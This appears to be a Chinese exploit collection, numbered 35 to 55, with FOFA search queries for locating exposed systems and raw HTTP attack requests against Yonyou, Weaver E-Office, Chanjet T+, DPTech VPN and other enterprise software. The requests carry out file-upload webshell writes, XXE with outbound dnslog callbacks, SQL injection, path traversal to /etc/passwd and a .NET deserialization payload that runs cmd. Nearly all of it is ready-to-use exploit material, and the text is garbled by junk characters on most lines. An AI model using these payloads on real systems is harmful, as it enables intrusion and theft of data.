Connection: keep-alive
5 |6 D, M) e1 r* z' X
! j( @- ?" s! t+ S
9 O/ Y3 s$ i# R6 N6 Z; G5 P) }# N35. 用友NC-Cloud importhttpscer任意文件上传$ U' }5 p. }& x1 c9 Z! x5 W( K; @
FOFA:app="用友-NC-Cloud"& n& u4 G$ y0 s6 t* S6 {6 w
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
) {  B/ T2 ]3 v; CHost: 203.25.218.166:88887 G) C8 J/ s5 V* ~
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
$ F3 i+ s* @7 l( I* E* eAccept-Encoding: gzip, deflate* [" N) @" o1 D) _, i
Accept: */*6 @5 U: _, R) @3 @
Connection: close
; r2 t( B7 b2 b- H/ y0 v; R& ]accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
: @. y  B. q& CContent-Length: 190
8 C% G8 z- X( k" P8 c2 kContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
$ p) K1 h3 O. e/ F, l2 K1 U) ?+ o+ H) x+ u% Q& C2 v; }
--fd28cb44e829ed1c197ec3bc71748df02 E% I) J5 O, B: k2 O: X
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
5 l3 j# B( U& o7 c) }) G( t6 g' D
, e. c" v% A8 t/ l/ |9 z<%out.println(1111*1111);%>
- s6 T( W/ X4 P, @! `--fd28cb44e829ed1c197ec3bc71748df0--' u# p: x" l: V  ^& a

* t5 f8 w' ^$ F7 K! T8 r! |! b+ b" r( s  d' k+ n& h7 v
36. 用友NC-Cloud soapFormat XXE
- `! V. K2 t* s7 _& v$ SFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/": a* N; H4 a' j5 G
POST /uapws/soapFormat.ajax HTTP/1.1
- e/ D, M& C% l) }9 ^! ^Host: 192.168.40.130:89892 C9 }1 ]+ S" {, d' \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
" J( _. ?$ O# W$ K! a( v: g) hContent-Length: 263
1 _0 {5 ~5 ?  k- N9 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: ]1 b6 Q: ~4 X- o( {" Q; ?Accept-Encoding: gzip, deflate
/ |1 Z* ]1 d" r7 O& Z4 K, w1 u+ i# n) zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, z( N. ~6 d" B! LConnection: close
" N! S, K5 Y' O9 o1 c9 tContent-Type: application/x-www-form-urlencoded5 H& ^0 Z6 @! \& z
Upgrade-Insecure-Requests: 1+ m* ?% ]3 }; y5 ^, e
- p$ v: U$ q- X! D
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a: f/ F5 ~$ s! w5 ?: l
" v+ r7 @" O2 Z2 P6 x
3 M4 M0 H# }0 z$ m; W, z1 k+ i
37. 用友NC-Cloud IUpdateService XXE
1 a. G2 S; @- F3 L: A. P# u4 zFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"" X' k# e- N# ^) K
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1# O6 A8 ^0 H% [) G. b* d! N8 O
Host: 192.168.40.130:8989
; w" X; U1 Z, V2 ^" t) ~# bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.365 i8 E7 G& a$ M: A
Content-Length: 421
0 l! |' p# z4 @  n( Z8 B6 a  OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: T2 g. K; ~. {' f. R
Accept-Encoding: gzip, deflate
. W& E1 v4 _% W. S$ VAccept-Language: zh-CN,zh;q=0.9
' n% C& m9 ]& U  X, R( dConnection: close
8 u4 R6 \+ M1 }9 s- b$ \Content-Type: text/xml;charset=UTF-8
9 j9 i7 [( f( s) F, `) I% P8 gSOAPAction: urn:getResult5 j. W! s  X: g1 K' R
Upgrade-Insecure-Requests: 1
; O! `' O1 G# g1 s' I3 w; X; q) K2 N0 F' }
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">( ~3 t/ [$ B. m. B
<soapenv:Header/>
8 g- U' \- @( n5 C6 T6 v0 ^<soapenv:Body>
! q9 y3 Z( u6 m6 s, I<iup:getResult>
5 x$ s* [0 x0 }8 m. y& ^<!--type: string-->
: h9 ~# C- S8 L3 T, G% K<iup:string><![CDATA[  b" b8 @: C! T( }; Y0 Z/ c; D
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>) i3 d/ A% y, A& D0 v$ U) E
<xxx/>]]></iup:string>
* x' b6 P$ k8 g$ C4 A</iup:getResult>( E5 p* S; Y' G1 J8 a, p
</soapenv:Body>- G: u6 `6 L2 ]; {; K1 O+ j4 g
</soapenv:Envelope>
" Z: y  p! q) @! P7 I- v
) O* Z% u- q5 q; Y0 _- r
4 |$ _/ z: }  i$ ^* r
$ x" V, t+ j" w# `38. 用友U8 Cloud smartweb2.RPC.d XXE
" }7 S( l3 T/ W+ ]4 GFOFA:app="用友-U8-Cloud"+ ~) j$ b# \0 M& _
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
9 R2 w) _5 e" o# A+ Q( uHost: 192.168.40.131:8088* T( b: d- T9 \! O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.258 O2 R( g. ?1 Z3 d( S; D
Content-Length: 260
+ G2 Q( P5 J: L& ~; bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" H& t+ w& h, l: i+ @
Accept-Encoding: gzip, deflate
3 D; M  }- V  e8 T, s( j5 b& AAccept-Language: zh-CN,zh;q=0.9
! T+ S! d- _4 {1 VConnection: close+ _! \. m: D  U$ k' b
Content-Type: application/x-www-form-urlencoded7 \! T) h2 v  {8 @$ P
+ ^; ?8 V: U# N
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
9 t9 j% ^( Q8 E4 ]" x0 L: M6 S' j8 r* D- `1 P) z# _" A

" u; H3 o# q: s7 n! z( `( v39. 用友U8 Cloud RegisterServlet SQL注入
8 @# H. z0 a( c- ]# {/ UFOFA:title="u8c"
  `9 Q( U& T, O7 CPOST /servlet/RegisterServlet HTTP/1.1
" \; b; f. ~  \. l! fHost: 192.168.86.128:80890 v* a/ e( J- I% r3 y/ S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36$ u" C: _" a: }: N- ]8 E" ?
Connection: close
1 [. y: z& }1 s* t% I) IContent-Length: 85/ I# @1 x5 s0 y5 t
Accept: */*
1 G) P6 W" v5 J1 e$ h. l- c, OAccept-Language: en! {' c0 \4 S& C/ ]
Content-Type: application/x-www-form-urlencoded
' Z" P  g+ p. r* |X-Forwarded-For: 127.0.0.1
( N1 h& e0 _5 e* L' p, a$ J6 ZAccept-Encoding: gzip
2 g% R# K. i- r6 J4 a. O' o) u7 Y* ~" n
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--2 f, f& B4 q# R# |

+ h, Y( i9 z0 k) Y& q% N. X
% Z6 n! |% j6 Z3 k+ _6 D# z+ F6 h40. 用友U8-Cloud XChangeServlet XXE
+ D9 {7 G6 ^( |FOFA:app="用友-U8-Cloud"
* M" j- F# D; W& ?" u: TPOST /service/XChangeServlet HTTP/1.1
6 @4 h- G5 M, Z7 v- }Host: x.x.x.x% T# L4 b$ O3 A  X4 D5 N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- b4 P9 s. \/ L8 w+ [  Z  c. U# ]
Content-Type: text/xml; y7 q  a4 u5 U! h3 A6 j2 x* L5 p1 b
Connection: close
. K5 l. o9 _3 g% R  G3 V% L- c& r: L; ^- z8 y( L6 Z; ~! W! n
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
% @! ?/ S- {: x, \* v/ |: Z7 F* `5 X% g' u
1 b4 B+ p5 ~: D" `! L9 _$ y
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入( L' v3 Z, G6 m  @% K
FOFA:app="用友-U8-Cloud"6 K2 |6 f4 h$ G! F2 U
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
& T: L% B( E2 G; N4 G# zHost:# X/ N3 t' R# y- {$ w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% h0 k9 X1 w/ R8 GContent-Type: application/json
# L& F5 @9 [. f. DAccept-Encoding: gzip0 ]5 K( i# O7 r  J& F: |1 d# k
Connection: close; t2 [% O3 E6 a% B# s& j; R* i
) o2 D; i/ f. C" O/ A$ s

5 w) u6 ^. {; D2 @* Y" a# Z+ X42. 用友GRP-U8 SmartUpload01 文件上传; [) P1 M* W' T, K8 v: b
FOFA:app="用友-GRP-U8"
/ I# K/ @, Y4 s; e$ N( T" ~* j0 Y1 zPOST /u8qx/SmartUpload01.jsp HTTP/1.19 T' ]3 m9 @* p$ Z
Host: x.x.x.x* e( U- i4 X6 b3 v& G, G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt" o; E0 Q* N4 v+ e9 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
. ?7 L# z' i) N5 g1 g9 L7 g  V3 O' Q9 X8 |- D* \
PAYLOAD" ?* u+ Z' h' `- F7 h5 V

) z/ }2 d, t" v/ f8 o9 m
  T, j6 K3 b' P, w( p/ Lhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml% ~, H  J8 {2 e  _. |3 |
( i: N* Z6 B* g9 r8 Z
43. 用友GRP-U8 userInfoWeb SQL注入致RCE( M( A" r# P" V; P( Z
FOFA:app="用友-GRP-U8"# J- }5 A! `# g  p3 g; |1 {+ V. f0 _
POST /services/userInfoWeb HTTP/1.1
4 ^( d2 [  B6 O, NHost: your-ip6 V5 Z, Y* V/ r6 H5 h! F$ H8 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
6 T) j. @: y9 |, \! g6 X5 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, _8 s! A( o7 LAccept-Encoding: gzip, deflate
7 Y: w) q1 O. V( @Accept-Language: zh-CN,zh;q=0.9" r# e1 F1 X. i( u! h3 B& f
Connection: close  V, Y5 ~! i1 X
SOAPAction:
  n9 y/ ~, f( uContent-Type: text/xml;charset=UTF-8
0 R. j) ]* j& C! W' L' `
; g. A" ?+ O/ p( N. g; U0 j, S<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">3 }; ?% ?  ~2 h0 y0 l& u6 |1 A, \
   <soapenv:Header/>4 ^3 l9 ~4 a6 `. k
   <soapenv:Body>6 u( X3 f' P. k2 y! s! B, b* I7 j
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">. E- ~* {) {- H3 ~- T( d
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>* l7 \# M* s( g. N
      </ser:getUserNameById>- K/ u0 @  ~6 \4 g8 ]
   </soapenv:Body>$ j9 y# G; v7 F& l" A$ Q8 }
</soapenv:Envelope>
+ S" @9 K4 f1 ~. _
/ x! q; ~7 D8 m2 v% U+ Y
/ k$ r" f9 }/ n  M  S44. 用友GRP-U8 bx_dj_check.jsp SQL注入
' q' l' t! `* O5 _3 I5 r$ Q  kFOFA:app="用友-GRP-U8"
% q) w+ \/ ]& x" U% S2 B; oGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.11 y/ w  ~; y% ?
Host: your-ip
$ K/ |2 i/ Z$ g6 f6 [* gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
. q* r# s4 \: v' _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# y. [. s+ ?! l) s+ Z4 LAccept-Encoding: gzip, deflate
0 c( r. d3 w- ~Accept-Language: zh-CN,zh;q=0.9
* A/ J7 l* y0 n+ _- o7 _- \Connection: close1 b4 N6 {0 _& f0 l  u- ?. `) j

, h; Q& K6 W( \. I! ]0 m( F8 d
8 H1 a+ `- v$ j+ D7 F* y5 O5 c- c* w45. 用友GRP-U8 ufgovbank XXE
/ T$ H; u+ k0 S4 z7 N7 F, gFOFA:app="用友-GRP-U8"; f2 e8 n: y* d5 p3 [' w1 m& v
POST /ufgovbank HTTP/1.1* x+ G  n. Y* U+ H' I4 @# T
Host: 192.168.40.130:222! y; ~6 o, I; D; e% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
/ h/ O, Y6 x3 |$ g8 }1 uConnection: close+ {2 r' W, o- D9 C# _8 s
Content-Length: 161
2 R5 z1 Y$ I0 N0 [' bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! ?/ `0 p- J1 Q* n; }3 j/ R; u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 t5 G1 `( P" a
Content-Type: application/x-www-form-urlencoded, W( q( i, }3 c+ [
Accept-Encoding: gzip& X/ J7 e* k" d) m9 ?) |
* b$ f# f9 ?& Q9 S
reqData=<?xml version="1.0"?>
8 k6 H& K2 H8 ^4 h<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
" T; g; U2 v1 s) o1 v  B9 T4 E- q! Z' x; t' P

; Q+ T8 B7 l$ ]) S* D" a* `6 U46. 用友GRP-U8 sqcxIndex.jsp SQL注入
" a$ S( _! Y* VFOFA:app="用友-GRP-U8"
4 H% f. q, D, F' j+ B' X) AGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1: V1 X  C2 J. `8 F) H
Host: your-ip. k6 {3 U  u+ v- Z: o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
7 ~- f1 r8 ~9 v: G- u8 ?$ l( hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% u3 c, y! V$ Q: H2 ^, `. c
Accept-Encoding: gzip, deflate
- R- L+ v3 d$ ~' o% P: eAccept-Language: zh-CN,zh;q=0.9& d7 N8 K1 n5 A1 L" Q' p
Connection: close
+ l  e- W/ j7 T! e5 t- y3 u# n" q' M$ ]. V; C, V" Z; O

0 L  {* b; w! u2 E6 t, P47. 用友GRP A++Cloud 政府财务云 任意文件读取
1 K- L( {4 ?* l! f$ N. \2 o7 E; wFOFA:body="/pf/portal/login/css/fonts/style.css"
4 z. @3 ~. ?# b7 wGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
1 v3 C/ i& Y$ ?Host: x.x.x.x( T0 E! y+ f- b) m0 V; U
Cache-Control: max-age=0
1 p$ H. n% J$ ^3 y- }0 q- E+ ~+ BUpgrade-Insecure-Requests: 1
3 |! P% S; ~% B# M6 J) UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  |3 h: H! a9 |( t" h, {4 n% q! a& CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 R6 ^7 q, b0 n. }" d% G- J
Accept-Encoding: gzip, deflate, br
5 y5 r: [* Z  l0 c6 M! N3 eAccept-Language: zh-CN,zh;q=0.93 M7 @- k; w% x& P1 x& z
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
  K& w% i7 f/ dConnection: close
" n( `$ _& n- t2 F( g
5 o5 h6 M" _) n; F2 Z' D$ H5 Z
. n# @8 V' q% W# H' l: n% i1 z+ R: m
% C, [+ N! g3 r* ~- T48. 用友U8 CRM swfupload 任意文件上传" W/ o6 r7 {5 E) z& f7 ^
FOFA:title="用友U8CRM"
1 t. ^, G8 ?- o7 yPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.19 v2 c. F% h+ K0 N* f! X7 W
Host: your-ip
; g2 [" v8 E" r: R9 J$ n3 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. p  `' d2 U; n$ X# ?. y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 A5 O* l5 W- L( ]- |1 u7 M5 u; X3 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 t+ B# W3 k' K& J1 i' U. k/ ^. ~Accept-Encoding: gzip, deflate
8 v" v% f6 d! ]Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
" o' `2 O6 v5 U/ t4 ^------269520967239406871642430066855$ A: B( ]; A( u2 |8 A' M% r0 M5 P
Content-Disposition: form-data; name="file"; filename="s.php"
6 g" ~, n( m. e" {+ B6 S8 Z1231) k: @. ^# H. n! f
Content-Type: application/octet-stream
. [. a) ]1 Y8 O, Y1 r& n------2695209672394068716424300668552 }6 H. N" S) x
Content-Disposition: form-data; name="upload"# j. {1 l- R! ~3 f
upload! M7 X2 ?5 `' l& N
------269520967239406871642430066855--
: x( K2 m: r3 ^# G" ?7 U/ e  _6 G8 {% v( X

1 o0 u+ i- f+ v. t- x49. 用友U8 CRM系统uploadfile.php接口任意文件上传+ a& t* N. l) a3 ?4 w) J% n7 I
FOFA:body="用友U8CRM"
" ?! j  \& v4 L2 Y- d/ ]' f5 c; s# g$ U# ^# P! u9 J5 S
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.16 v% a0 p& z& Z# w! p, ^+ J
Host: x.x.x.x
9 o5 R$ x; }* B- G+ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; ~: ~# x+ _- o/ M4 A- t, A3 B
Content-Length: 329
. M9 p4 d$ p! F& _4 v: `6 ?% f$ K7 F0 ]* TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* E. T8 n8 ~8 l; Y
Accept-Encoding: gzip, deflate
& y/ T4 M  N' N, m, s  P0 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& R3 I8 X+ X  w0 JConnection: close" P5 K. y: Y) d, O4 \: B- j
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w4 \0 k+ b) E5 ?/ K; x% k
" x/ `3 p) h2 ~0 X  {# J7 L+ V
-----------------------------vvv3wdayqv3yppdxvn3w
# T& A5 J, D$ P# Y& R* j! a2 |Content-Disposition: form-data; name="file"; filename="%s.php "2 `8 e' r1 w/ S$ B5 m# }; Z
Content-Type: application/octet-stream
  ?2 F, c" F2 q) v* P0 V5 ^. b4 f6 }, n* I& k+ V1 x1 l
wersqqmlumloqa
9 ], T' \  K! ?- W3 v$ i3 M+ _-----------------------------vvv3wdayqv3yppdxvn3w& J' l% ^/ l% v/ r# y
Content-Disposition: form-data; name="upload". M; g% s3 A0 h4 F; r
- f2 Q+ U+ K- Y; i) o3 _7 F# {
upload- p# q$ n4 Q7 h! I5 @3 @
-----------------------------vvv3wdayqv3yppdxvn3w--8 ?' M% n3 a) X+ G& w  k: `* P) e
4 T: ]4 ~' f( n# h

0 E7 ~( F' ^- p* o$ rhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
3 Y, i$ b! t- [
8 F: a" D+ w- d) z( q) n50. QDocs Smart School 6.4.1 filterRecords SQL注入
% a" U( g1 I3 F  y+ W: t: J0 VFOFA:body="close closebtnmodal"
$ O' M& l5 e$ ?! o. A0 D/ k3 EPOST /course/filterRecords/ HTTP/1.16 E3 `4 N( |/ V4 ?
Host: x.x.x.x, _" `" e; Z  ^; f( P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. U% S1 T. e% O( h) K
Connection: close4 d7 ^0 a( q8 I* p5 x' @) o
Content-Length: 224
1 K* P- t: ?1 qAccept: */*) s9 G* L0 Q/ ?6 g4 p2 l/ h4 H) s
Accept-Language: en  m. x+ A% @8 w9 e5 D& C- s
Content-Type: application/x-www-form-urlencoded
, {5 I; Z8 |. X' n: bAccept-Encoding: gzip9 h& \0 {  c& y

5 k" z' Z0 |* f, s2 Vsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1* d5 e- Z5 y9 z* l2 Q& h

8 ?! U9 r; B& {! z& h; Q7 s1 P
3 a$ T; B* m7 f4 U  X51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
, x* ^# }% \1 ~/ }- O* rFOFA:app="云时空社会化商业ERP系统"
6 D4 h' k; A3 @  W+ W% r  O4 t& [GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.10 y1 k8 q! k: G# v% |
Host: your-ip
; q& ~+ e: N3 K& q6 q9 o  D, cUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36: ]9 Q) [- B2 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: b# @% I$ T# Q% ~
Accept-Encoding: gzip, deflate
! y3 r& Z1 G8 l0 H3 nAccept-Language: zh-CN,zh;q=0.9
$ h% ~, M7 @" Y5 QConnection: close( d5 x! y" S! D/ ^2 X

" ~# N# V$ I8 O' c* A' ]8 e5 F/ z, J/ m7 \; y
52. 泛微E-Office json_common.php sql注入
; `/ I* i( E$ [! R6 j. z# M: jFOFA:app="泛微-EOffice"
3 a+ Y) z/ g: M5 O+ o7 h9 F) p9 QPOST /building/json_common.php HTTP/1.1) H4 d. {" ]8 y0 f& \$ o
Host: 192.168.86.128:80974 }9 [7 ^& z! S3 R% }1 I0 ^
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# ]& A( L# ?$ d5 N1 K6 o6 A) M1 \" `Connection: close% L% \% `( R; D+ S! e# e
Content-Length: 879 c4 B4 g. r3 k8 [6 I. Z
Accept: */*$ u  W8 p8 _9 |! Y) |8 g
Accept-Language: en6 V( c9 t/ }. d: c6 G- v; B
Content-Type: application/x-www-form-urlencoded- ]9 @7 g, c: J. ~$ K
Accept-Encoding: gzip  v. e2 u+ a8 F& X$ G
8 ^+ I/ y9 i8 C% J
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333/ C$ C+ X2 T8 G- _

; k$ k5 N5 S" F) y- c( p' p) I+ t( x6 D, y/ @7 y' k0 j
53. 迪普 DPTech VPN Service 任意文件上传
* W+ \0 z$ B7 Z) N5 d/ OFOFA:app="DPtech-SSLVPN": w5 f( }/ n( v( {( J
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
$ m+ x# T9 L9 ?/ V% p9 d
+ f  ^" a2 O6 ~" e
9 ^$ E- x: H' x) N: B+ u# z5 A54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( l% W: D5 x) Q" z4 y& j0 f3 s& U6 }FOFA:app="畅捷通-TPlus"4 b9 n# W/ ^  C+ k6 Y/ O! F- E
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
! i5 y) @4 w  @"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 |6 T) i0 q: B: R/ T% g; P; {2 u' c$ x

- K/ H) _: K, H# ?+ o3 B# g- S& p完整数据包
* Z$ O; V. ~; C7 b# |& NPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 J5 ^* @  y" y/ s' d& `Host: x.x.x.x
# W* x9 }4 f3 v# V' D9 cUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" y1 c1 S9 |9 A$ ]; P6 E- r
Content-Length: 593% x6 [, I$ U; N' d

. ~9 P/ {1 S- t8 t' e' r. b{
. l! ~3 `- b2 ~( \  D2 `"storeID":{
" T8 }% P  g$ G- v "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& y: K8 n4 W- j6 `7 r, w# ~: B" w
"MethodName":"Start",! H- q  t! I/ e7 e2 i' @' {1 ~% m
  "ObjectInstance":{- F. B7 M. A7 G' d: D( ?
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& ~1 q2 v$ }/ |% j. s; e/ t$ K2 E
    "StartInfo":{) g5 F+ s! \1 v' @' u
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- l" M, R5 _& c  Z    "FileName":"cmd",/ j4 D! K# }3 e# J  w
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 q; c6 w+ F; O/ A$ R' K6 s5 T
    }2 G6 l6 Y& E, l6 R+ F' _5 ?- U
  }
* P4 f/ G5 |. G: ?4 x7 i! E; ~  }0 \, Y9 g4 z' G. }1 X
}, H4 |* j( _$ O+ x  R+ w2 j  C
: V  s9 x# B. o$ X
8 h& s1 Y7 `# ?) r/ E
第二步,访问如下url& C) E8 `6 {# p) b& S" p+ P* l; s8 K
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
1 I% G+ p9 i( r$ l! x6 y+ c
, h, i/ y  r' d5 X/ h" N8 f  O# M- M0 F' f+ _  S2 Z. _& X
55. 畅捷通T+ getdecallusers信息泄露+ \: r, F# w# ~
FOFA:app="畅捷通-TPlus"7 E. c( X5 ]: k# c; w& {/ I
第一步,通过
8 L; E8 A7 A2 l. \& m* E/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie& E$ v3 y7 Z5 g
第二步,利用获取到的Cookie请求0 Y5 i9 z" Q2 G9 n
